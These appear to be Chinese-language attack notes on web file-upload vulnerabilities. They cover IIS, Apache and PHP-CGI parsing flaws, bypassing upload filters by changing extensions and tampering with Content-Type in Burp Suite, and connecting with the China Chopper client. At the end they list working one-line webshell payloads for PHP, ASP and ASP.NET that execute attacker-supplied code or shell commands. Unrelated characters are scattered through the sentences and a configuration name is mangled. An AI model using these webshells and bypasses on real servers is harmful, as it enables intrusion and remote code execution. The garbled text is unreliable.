原因:
1.目錄過濾不嚴(yán),攻擊者可能建立畸形目錄
2.文件未重命名,攻擊者可能利用Web容器解析漏洞
3.客戶端過濾
利用:上傳漏洞可以直接得到webshell
解析漏洞
1. IIS解析漏洞
當(dāng)建立.asa、.asp格式的文件夾時(shí),其目錄下的任意文件都被IIS當(dāng)作asp文件來解析。
-
當(dāng)文件為*.asp;1.jpg時(shí)缺亮,IIS同樣會(huì)以ASP腳本來執(zhí)行。
WebDav漏洞:是一種基于HTTP1.1協(xié)議的通信協(xié)議桥言,支持Put,Move,Copy等方法萌踱,可能有安全隱患,桂林老兵的IIS Write工具可以進(jìn)行掃描号阿。
2.Apache解析漏洞
解析原則: 遇到不認(rèn)識(shí)的擴(kuò)展名將從后向前解析虫蝶,如果都不認(rèn)識(shí),會(huì)暴露源代碼倦西。支持的擴(kuò)展名在(apache安裝目錄的/conf/mine.types/)
3.PHP的cgi解析漏洞
- Nginx通常用來作為PHP的解析容器
- 上傳圖片木馬在url后面加上“/.php”能真,圖片就會(huì)被當(dāng)作php腳本解析,php配置文件中cgi.fi:x_pathinfo*在有些版本中默認(rèn)開啟,php會(huì)向前遞歸解析粉铐。
客戶端驗(yàn)證繞過
- 使用FireBug直接刪除客戶端JavaScript驗(yàn)證代碼
- Burp Suite修改數(shù)據(jù)包
服務(wù)器端驗(yàn)證
- 黑白名單
- MIME驗(yàn)證
- 目錄驗(yàn)證
- 截?cái)嗌蟼鞴?/li>
1.擴(kuò)展名繞過
- 如果.php不能上傳疼约,直接修改擴(kuò)展名(phP)再上傳
- “菜刀”拿到webshell
2. JS繞過
- 修改要上傳的木馬文件類型
- 用burpsuite攔截上傳數(shù)據(jù)包,修改回原來的數(shù)據(jù)類型蝙泼,上傳成功
- 用“中國菜刀” 連接木馬地址程剥,密碼為“123”
3.Content-Type(HTTP層)
Content-Type:內(nèi)容類型,一般是指網(wǎng)頁中存在的Content-Type汤踏,用于定義網(wǎng)絡(luò)文件的類型和網(wǎng)頁的編碼织鲸,決定文件接收方將以什么形式、什么編碼讀取這個(gè)文件溪胶,這就是經(jīng)陈Р粒看到一些Asp網(wǎng)頁點(diǎn)擊的結(jié)果卻是下載到的一個(gè)文件或一張圖片的原因。
- 查看源碼發(fā)現(xiàn)沒有對上傳文件進(jìn)行限制哗脖,上傳失敗可能是后臺(tái)有判斷
- 用burpsuite抓包修改Content-Type的值為“image/jpeg”瀑踢,圖片地址就是木馬文件地址
- 用“中國菜刀”進(jìn)行其他入侵
一句話木馬:
PHP:
<?php @eval ($_POST[123]);?>
<?php echo shell_exec($_GET['cmd']);?>
ASP: <%eval request("chopper")%>
ASP.NET:
<%@ page Language="Jscript"%>
<%eval(Request.Item["chopper"],"unsafe');%>
圖片一句話木馬制作軟件:Edjpgcom